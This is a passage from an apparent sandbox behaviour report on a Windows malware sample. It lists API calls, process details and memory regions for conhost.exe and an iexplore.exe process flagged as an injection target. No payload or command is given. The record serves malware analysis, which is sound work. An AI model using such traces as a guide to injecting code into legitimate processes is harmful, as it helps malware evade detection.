Flags=0x0, BaseAddress=0x45407e0) returned 1 [0136.162] GetProcessHeap () returned 0x4540000 [0136.162] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x45405c8) returned 1 [0136.162] GetProcessHeap () returned 0x4540000 [0136.162] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x45491b0) returned 1 [0136.162] GetProcessHeap () returned 0x4540000 [0136.163] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549178) returned 1 [0136.163] GetProcessHeap () returned 0x4540000 [0136.163] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4547270) returned 1 [0136.163] GetProcessHeap () returned 0x4540000 [0136.163] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549108) returned 1 [0136.163] GetProcessHeap () returned 0x4540000 [0136.163] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549090) returned 1 [0136.164] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.164] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0136.164] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.164] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x18f40c | out: lpMode=0x18f40c) returned 1 [0136.165] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.165] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x18f408 | out: lpMode=0x18f408) returned 1 [0136.165] SetConsoleInputExeNameW () returned 0x1 [0136.165] GetConsoleOutputCP () returned 0x1b5 [0136.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x18f460 | out: lpCPInfo=0x18f460) returned 1 [0136.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.166] exit (_Code=0) Thread: id = 68 os_tid = 0xbe4 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7b901000" os_pid = "0x984" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x630" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1070 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1071 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1072 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1073 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1074 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1075 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1076 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1077 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1078 start_va = 0x7ff6880d0000 end_va = 0x7ff6880e0fff monitored = 0 entry_point = 0x7ff6880d16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1079 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1081 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1082 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1083 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1084 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1085 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1086 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1087 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1088 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1089 start_va = 0x600000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1090 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1091 start_va = 0x7ffd9f520000 end_va = 0x7ffd9f578fff monitored = 0 entry_point = 0x7ffd9f52fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1092 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1093 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1094 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1095 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1096 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1097 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1098 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1099 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1100 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1101 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1102 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1103 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1104 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1105 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1106 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1107 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1108 start_va = 0xb70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 1109 start_va = 0x1f70000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 1110 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1111 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1112 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1113 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1114 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1115 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1116 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1117 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1118 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1119 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1120 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1121 start_va = 0x7ffda6530000 end_va = 0x7ffda65c5fff monitored = 0 entry_point = 0x7ffda6555570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1122 start_va = 0x2160000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1123 start_va = 0x2350000 end_va = 0x2686fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1124 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1125 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1126 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1127 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1128 start_va = 0x2690000 end_va = 0x28acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 1129 start_va = 0x28b0000 end_va = 0x2ac2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 1130 start_va = 0x1f70000 end_va = 0x2087fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 1131 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1132 start_va = 0x2ad0000 end_va = 0x2ceafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1133 start_va = 0x2160000 end_va = 0x226dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1134 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Thread: id = 65 os_tid = 0x410 Thread: id = 66 os_tid = 0xaf4 Thread: id = 67 os_tid = 0x9ec Process: id = "8" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x60525000" os_pid = "0x5d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" about:blank" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1182 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1183 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1184 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1185 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1186 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1187 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1188 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1189 start_va = 0x180000 end_va = 0x181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1190 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1191 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1192 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1193 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1194 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1195 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1196 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1197 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1198 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1199 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1200 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1201 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1202 start_va = 0x5e0000 end_va = 0x5f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1203 start_va = 0x6e0000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1204 start_va = 0x870000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1205 start_va = 0xa00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1206 start_va = 0x1e00000 end_va = 0x1e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1207 start_va = 0x1e10000 end_va = 0x1e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1208 start_va = 0x1e20000 end_va = 0x1e20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 1209 start_va = 0x1e30000 end_va = 0x1e33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 1210 start_va = 0x1e40000 end_va = 0x1e40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 1211 start_va = 0x1e50000 end_va = 0x1e50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1212 start_va = 0x1e60000 end_va = 0x1e60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 1213 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 1214 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 1215 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1216 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 1217 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 1218 start_va = 0x1ec0000 end_va = 0x1ec0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 1219 start_va = 0x1ed0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1220 start_va = 0x1ee0000 end_va = 0x2216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1221 start_va = 0x2220000 end_va = 0x22dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 1222 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1223 start_va = 0x23e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1224 start_va = 0x24e0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1225 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1226 start_va = 0x26e0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 1227 start_va = 0x27e0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1228 start_va = 0x28e0000 end_va = 0x2a67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 1229 start_va = 0x2a70000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 1230 start_va = 0x2b70000 end_va = 0x2c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 1231 start_va = 0x2e70000 end_va = 0x2e76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 1232 start_va = 0x2e80000 end_va = 0x2e80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e80000" filename = "" Region: id = 1233 start_va = 0x2e90000 end_va = 0x2e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e90000" filename = "" Region: id = 1234 start_va = 0x2ea0000 end_va = 0x2ea5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1235 start_va = 0x2eb0000 end_va = 0x2eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 1236 start_va = 0x2ec0000 end_va = 0x2ec5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1237 start_va = 0x2ed0000 end_va = 0x2ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 1238 start_va = 0x2ee0000 end_va = 0x2ee5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 1239 start_va = 0x2ef0000 end_va = 0x2ef5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 1240 start_va = 0x2f00000 end_va = 0x2f05fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1241 start_va = 0x2f10000 end_va = 0x2f19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 1242 start_va = 0x2f20000 end_va = 0x2f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 1243 start_va = 0x2f30000 end_va = 0x2f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1244 start_va = 0x2f40000 end_va = 0x2f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1245 start_va = 0x2f50000 end_va = 0x2f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1246 start_va = 0x2f60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1247 start_va = 0x2f70000 end_va = 0x2f70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 1248 start_va = 0x2f80000 end_va = 0x2f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 1249 start_va = 0x2f90000 end_va = 0x2f90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 1250 start_va = 0x2fa0000 end_va = 0x2fa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 1251 start_va = 0x2fb0000 end_va = 0x2fb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 1252 start_va = 0x2fc0000 end_va = 0x2fc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002fc0000" filename = "" Region: id = 1253 start_va = 0x2fd0000 end_va = 0x30cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 1254 start_va = 0x30d0000 end_va = 0x30d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1255 start_va = 0x30e0000 end_va = 0x30effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030e0000" filename = "" Region: id = 1256 start_va = 0x30f0000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 1257 start_va = 0x3100000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003100000" 